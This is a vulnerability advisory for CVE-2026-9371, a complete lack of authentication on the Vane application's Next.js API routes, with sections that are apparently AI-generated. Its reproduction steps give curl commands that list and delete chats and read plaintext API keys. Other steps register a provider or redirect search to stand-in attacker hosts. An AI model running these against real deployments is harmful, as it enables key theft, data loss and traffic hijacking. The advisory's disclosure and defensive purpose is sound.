ItzCrazyKns Vane API route.ts missing authentication
Description
A security vulnerability has been detected in ItzCrazyKns Vane up to 1.12.1. Affected by this issue is some unknown functionality of the file route.ts of the component API. The manipulation leads to missing authentication. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been disclosed publicly and may be used. It appears that basic authentication is planned.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vane up to 1.12.1 has no authentication on any API endpoint, allowing unauthenticated remote attackers to read config, access API keys, modify data, and upload files.
Vulnerability
CVE-2026-9371 affects Vane versions up to and including 1.12.1 [1]. The vulnerability exists in all Next.js API route handlers located in src/app/api/*/route.ts. Every endpoint processes requests without any authentication or authorization checks. There is no authentication middleware, no session validation, no API key verification, and no user model in the SQLite database. The entire application configuration, chat history, provider settings, and file upload functionality are exposed without access control [1][2].
Exploitation
An unauthenticated remote attacker can exploit this vulnerability by sending HTTP requests to any exposed API endpoint, such as GET /api/config [2]. The attack requires no authentication, no user interaction, and no special privileges. The attacker simply makes requests to the Vane service (default port 3001) and can access or manipulate any API function [1][2].
Impact
Successful exploitation allows an attacker to read and modify the application configuration, including third-party API keys for providers like OpenAI, Anthropic, and Google Gemini [2]. The attacker can also read and delete chat history, upload arbitrary files, create, modify, and delete LLM model providers, consume LLM API quotas, hijack active sessions, and redirect search infrastructure [1]. This constitutes a complete compromise of the application's confidentiality, integrity, and availability [1].
Mitigation
As of the latest references, no patch has been released for this vulnerability [1][2]. The issue is publicly disclosed and tracked on GitHub [1]. The developer has indicated that basic authentication is planned, but no timeline for a fix is provided [1]. Users should restrict network access to the Vane service using a firewall or reverse proxy with authentication until an official update is available.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=1.12.1
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Complete architectural omission of authentication and authorization — no middleware, no per-route auth guards, and no user model in the application."
Attack vector
An unauthenticated remote attacker can reach any API endpoint on the Vane service port (default 3001) without any authentication, session validation, or API key checks [ref_id=1]. The attacker first enumerates the full configuration and all LLM provider API keys via `GET /api/config` [ref_id=2]. With those keys, the attacker can then read and delete all chat history (`GET/DELETE /api/chats/[id]`), create malicious model providers pointing to attacker-controlled infrastructure (`POST /api/providers`), redirect the search backend to an attacker server (`POST /api/config`), hijack active streaming sessions via `POST /api/reconnect/[id]`, and consume LLM API quotas by initiating chat sessions [ref_id=1].
Affected code
All 16+ Next.js API route handlers in `src/app/api/*/route.ts` lack any authentication or authorization checks. The configuration endpoint (`src/app/api/config/route.ts`) returns the full configuration object, including plaintext API keys, via `configManager.getCurrentConfig()` without filtering. No `middleware.ts` file exists in the project, confirming a complete architectural omission of access control [ref_id=1][ref_id=2].
What the fix does
No patch has been published by the vendor as of the advisory date [ref_id=1]. The advisory recommends implementing Next.js middleware authentication (e.g., a `src/middleware.ts` file that validates a Bearer token on all `/api/:path*` routes), adding user authentication with session management (e.g., NextAuth.js), and deploying network-level controls such as binding to `127.0.0.1` only or placing the service behind a reverse proxy with HTTP Basic Auth [ref_id=1]. The root cause is a complete absence of authentication logic in every route handler and no user model in the SQLite schema [ref_id=1].
Preconditions
- networkAttacker must have network access to the Vane service port (default 3001)
- authNo authentication credentials or session tokens are required
Reproduction
1. Enumerate all chat history without authentication: `curl -s http://localhost:3001/api/chats | python3 -m json.tool` [ref_id=1]. 2. Read the full configuration including plaintext API keys: `GET /api/config` [ref_id=2]. 3. Create a malicious model provider pointing to attacker infrastructure: `curl -s -X POST http://localhost:3001/api/providers -H "Content-Type: application/json" -d '{"type":"ollama","name":"attacker-proxy","config":{"baseURL":"http://attacker.com:11434"}}'` [ref_id=1]. 4. Redirect the search backend to an attacker-controlled server: `curl -s -X POST http://localhost:3001/api/config -H "Content-Type: application/json" -d '{"key":"search.searxngURL","value":"http://attacker-controlled.com:8080"}'` [ref_id=1]. 5. Delete a specific chat and its messages: `curl -s -X DELETE "http://localhost:3001/api/chats/{id}"` [ref_id=1].
Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/ItzCrazyKns/Vane/issues/1123mitreexploitissue-tracking
- vuldb.com/submit/813209mitrethird-party-advisory
- vuldb.com/submit/813210mitrethird-party-advisory
- github.com/ItzCrazyKns/Vane/issues/1122mitreissue-tracking
- vuldb.com/vuln/365334mitrevdb-entry
- vuldb.com/vuln/365334/ctimitresignaturepermissions-required
News mentions
0No linked articles in our index yet.